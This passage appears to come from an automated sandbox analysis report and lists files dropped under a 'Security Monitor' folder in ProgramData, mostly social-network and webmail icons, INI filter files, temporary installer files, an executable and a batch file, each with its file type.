dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\myspace.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\odnoklassniki.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\odnoklassniki.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\qqzone.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\qqzone.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\twitter.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\twitter.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\vkontakte.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\vkontakte.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\youtube.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\youtube.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\GMX.com.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Gmail.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Mail.RU.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Mail.com.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Outlook Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Outlook.Live.com.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Yahoo Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Yandex Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\facebook.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\google+.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\imp.free.fr.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\instagram.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-07QHH.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-2JVSN.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-2TTRE.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-3OLB7.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-3TAFS.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-48PES.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-6LKCL.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-8NBV5.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-BQELM.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-DIE9M.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-E47BI.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-E9CVV.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-F6LJG.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-FLQ9H.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-FM5FR.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-JAAI0.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-LNKG9.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-PJQCK.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-PU2SN.tmp
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-RJRR9.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-TQMOT.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-UEDQF.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-UL3V4.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-VO1I9.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\linkedin.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\mail.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\mail.png (copy)
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\messagerie.orange.fr.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\my.screenname.aol.com.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\myspace.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\odnoklassniki.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\qqzone.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\twitter.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\twitter_.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\vkontakte.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\youtube.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\SNets.ini (copy)
|
Generic INItialization configuration [Instagram]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\default.ini (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki.ini (copy)
|
Generic INItialization configuration [Marks]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\About.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Friends.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Guests.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Marks.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Photos.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Profiles.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-2957B.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-4L2RG.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-68427.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-BBKC6.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-DHFK7.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-J6TAL.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte.ini (copy)
|
Generic INItialization configuration [Friends]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Friends.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Messages.png (copy)
|
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Notifications.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Replies.png (copy)
|
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-8O74N.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-ECPEG.tmp
|
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-G4A24.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-OMNCV.tmp
|
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook.ini (copy)
|
Generic INItialization configuration [News]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Apps.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Events.png (copy)
|
PNG image data, 15 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Facebook Ads.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Find friends.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Friends List.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Friends.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Gifts.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Groups.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Invite friends.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Messages.png (copy)
|
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\News.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Notifications.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Payments.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Privacy.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Security.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Settings.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Subscribers.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Welcome.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-0KNDI.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-3QASK.tmp
|
PNG image data, 15 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-48GKB.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-6R7T7.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-AN4OF.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-BSOFR.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-DD09A.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-DVK2C.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-EA13V.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-FHUQ2.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-FT54P.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-HTC07.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-IF041.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-ISATB.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-JIDC9.tmp
|
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-JQ20S.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-PJPPP.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-QPRL4.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\is-4PJ4H.tmp
|
Generic INItialization configuration [Friends]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\is-ACPUD.tmp
|
Generic INItialization configuration [Marks]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\is-IMKB1.tmp
|
Generic INItialization configuration [News]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\is-7MDVH.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\is-FCREC.tmp
|
Generic INItialization configuration [Instagram]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\ru\default.ini (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\ru\is-UBBKJ.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\zh\default.ini (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\zh\is-D57HS.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SearchEn\SearchEn.ini (copy)
|
Generic INItialization configuration [Bing]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SearchEn\is-D4I3D.tmp
|
Generic INItialization configuration [Bing]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\is-DR9RM.tmp
|
Unicode text, UTF-8 (with BOM) text, with very long lines (4429), with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\url_cat (copy)
|
Unicode text, UTF-8 (with BOM) text, with very long lines (4429), with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)
|
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\iMsgInfo.bmp (copy)
|
PC bitmap, Windows 3.x format, 48 x 48 x 24, resolution 2835 x 2835 px/m, cbSize 6966, bits offset 54
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\id.cmd (copy)
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
||
